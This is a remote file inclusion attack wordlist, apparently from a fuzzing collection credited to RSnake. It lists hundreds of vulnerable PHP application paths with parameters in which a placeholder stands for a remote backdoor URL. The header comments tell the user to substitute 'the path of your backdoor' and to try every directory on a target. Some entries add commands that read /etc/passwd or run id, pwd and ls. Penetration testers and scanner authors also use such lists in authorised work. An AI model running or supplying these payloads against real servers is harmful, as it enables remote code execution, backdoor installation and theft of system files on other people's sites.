/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
/twebs/modules/misc/usermods.php?ROOT=XXpathXX
/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
/unavailable.php?bibtexrootrel=XXpathXX?
/unsubs.php?scdir=XXpathXX
/up.php?my[root]=XXpathXX
/upload.php?save_path=XXpathXX?
/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
/upload/top.php?maindir=XXpathXX?
/upload/xax/admin/modules/install_module.php?level=XXpathXX?
/upload/xax/admin/patch/index.php?level=XXpathXX?
/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
/upload_local.php?target=XXpathXX?
/upload_multi.php?target=XXpathXX?
/urlinn_includes/config.php?dir_ws=XXpathXX?
/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
/user_new_2.php?home=XXpathXX
/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
/vb/includes/functions.php?classfile=XXpathXX
/vb/includes/functions_cron.php?nextitem=XXpathXX
/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
/view.php?ariadne=XXpathXX?
/view.php?id=XXpathXX
/view_func.php?i=XXpathXX&l=testfile.txt?
/views/print/printbar.php?views_path=XXpathXX
/visible_count_inc.php?statitpath=XXpathXX
/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
/volume.php?config[public_dir]=XXpathXX?
/vote.php?Madoa=XXpathXX?
/votebox.php?VoteBoxPath=XXpathXX
/vp/configure.php?phpbb_root_path=XXpathXX?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
/war.php?vwar_root=XXpathXX
/warn.php?file=XXpathXX
/watermark.php?GALLERY_BASEDIR=XXpathXX
/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/web/Flickrclient.php?path_prefix=XXpathXX
/web/help.php?LIBSDIR=XXpathXX
/web/includes/blogger.php?path_prefix=XXpathXX
/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/web/includes/functions/html_generate.php?path_prefix=XXpathXX
/web/includes/functions/validations.php?path_prefix=XXpathXX
/web/index.php?LIBSDIR=XXpathXX
/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
/web/login.php?LIBSDIR=XXpathXX
/web/logout.php?LIBSDIR=XXpathXX
/web/lom.php?ETCDIR=XXpathXX
/web/network_module_selector.php?path_prefix=XXpathXX
/web/submit_abuse.php?path_prefix=XXpathXX
/web/submit_comment.php?path_prefix=XXpathXX
/webavis/class/class.php?root=XXpathXX?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/webnews/template.php?content_page=XXpathXX?
/webroot/css.php?CONFIGS=XXpathXX
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
/window.php?action=XXpathXX
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
/work/index.php?g_include=XXpathXX
/work/module/forum/forum.php?g_include=XXpathXX
/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
/wp-cache-phase1.php?plugin=XXpathXX
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
/wsk/wsk.php?wsk=XXpathXX
/xarg_corner.php?xarg=XXpathXX?
/xarg_corner_bottom.php?xarg=XXpathXX?
/xarg_corner_top.php?xarg=XXpathXX?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=XXpathXX
/yabbse/Sources/Packages.php?sourcedir=XXpathXX
/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
/zipndownload.php?PP_PATH=XXpathXX?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
# Compiled by @RSnake (2010-01-02).
# Mostly from milw0rm, osvdb.org and elsewhere.
# Change !INJECT! to the path of your backdoor.
# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
# E.g.: !INJECT! => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
/123flashchat.php?e107path=!INJECT!
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!?
/=!INJECT!
/?_CONFIG[files][functions_page]=!INJECT!
/?npage=-1&content_dir=!INJECT!%00&cmd=ls
/?npage=1&content_dir=!INJECT!%00&cmd=ls
/?show=!INJECT!?
/A-Blog/navigation/donation.php?navigation_start=!INJECT!
/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
/A-Blog/navigation/links.php?navigation_start=!INJECT!?
/A-Blog/navigation/search.php?navigation_end=!INJECT!?
/A-Blog/sources/myaccount.php?open_box=!INJECT!?
/ACGVnews/header.php?PathNews=!INJECT!
/ATutor/documentation/common/frame_toc.php?section=!INJECT!
/ATutor/documentation/common/search.php?section=!INJECT!
/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/Administration/Includes/configureText.php?path_prefix=!INJECT!
/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/Administration/Includes/userHome.php?path_prefix=!INJECT!
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
/BE_config.php?_PSL[classdir]=!INJECT!
/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
/Base/Application.php?pear_dir=!INJECT!
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
/CheckUpload.php?Language=!INJECT!&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
/DynaTracker_v151/action.php?base_path=!INJECT!
/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
/FirstPost/block.php?Include=!INJECT!
/Flickrclient.php?path_prefix=!INJECT!
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
/Full_Release/include/body_comm.inc.php?content=!INJECT!
/Gallery/displayCategory.php?basepath=!INJECT!
/Include/lib.inc.php3?Include=!INJECT!?
/Include/variables.php3?Include=!INJECT!?
/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
/ListRecords.php?lib_dir=!INJECT!?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
/PHP/includes/header.inc.php?root=!INJECT!?
/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
/PaTh/index.php?rootpath=!INJECT!
/Path_Script/createurl.php?formurl=!INJECT!
/PhotoCart/adminprint.php?admin_folder=!INJECT!
/Picssolution/install/config.php?path=!INJECT!?
/RGboard/include/footer.php?_path[counter]=!INJECT!?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
/SQuery/lib/gore.php?libpath=!INJECT!
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
/ScriptPath/footers.php?tinybb_footers=!INJECT!
/ScriptPath/index.php?page=!INJECT!
/Script_Path/config.inc.php?_path=!INJECT!?
/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
/Somery/team.php?checkauth=!INJECT!
/Upload/install.php?skindir=!INJECT!
/Widgets/Base/Footer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
/[path]/mybic_server.php?file=!INJECT!
/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
/_administration/securite.php?cfg[document_uri]=!INJECT!
/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
/_connect.php?root=!INJECT!
/_friendly/core/data/_load.php?friendly_path=!INJECT!
/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
/_friendly/core/display/_load.php?friendly_path=!INJECT!
/_friendly/core/support/_load.php?friendly_path=!INJECT!
/_functions.php?prefix=!INJECT!
/_includes/settings.inc.php?approot=!INJECT!
/_theme/breadcrumb.php?rootBase=!INJECT!
/_wk/wk_lang.php?WK[wkPath]=!INJECT!
/abf_js.php?abs_pfad=!INJECT!?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/about.php?bibtexrootrel=!INJECT!?
/aboutinfo.php?bibtexrootrel=!INJECT!?
/acc.php?page=!INJECT!
/access/login.php?path_to_root=!INJECT!
/account.php?insPath=!INJECT!
/accsess/login.php?path_to_root=!INJECT!
/active/components/xmlrpc/client.php?c[components]=!INJECT!
/ad_main.php?_mygamefile=!INJECT!
/add.cgi.php?blog_theme=!INJECT!
/add_link.php?blog_theme=!INJECT!
/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
/addressbook.php?GLOBALS[basedir]=!INJECT!?
/addsite.php?returnpath=!INJECT!
/addvip.php?msetstr["PROGSDIR"]=!INJECT!
/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
/admin.loudmouth.php?mainframe=!INJECT!
/admin.php?Madoa=!INJECT!?
/admin.php?cal_dir=!INJECT!
/admin.php?env_dir=!INJECT!
/admin.php?lang=!INJECT!
/admin.php?page[path]=!INJECT!?&cmd=ls
/admin.php?submit=submit&form_include_template=!INJECT!
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/admin/ST_countries.php?include_path=!INJECT!?
/admin/ST_platforms.php?include_path=!INJECT!?
/admin/addentry.php?phpbb_root_path=!INJECT!?
/admin/addons/archive/archive.php?adminfolder=!INJECT!
/admin/admin.php?path=!INJECT!
/admin/admin.php?site_url=!INJECT!
/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
/admin/admin_news_bot.php?root_path=!INJECT!?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
/admin/admin_users.php?phpbb_root_path=!INJECT!
/admin/auth.php?xcart_dir=!INJECT!?
/admin/auth/secure.php?cfgProgDir=!INJECT!?
/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
/admin/catagory.php?language=!INJECT!
/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
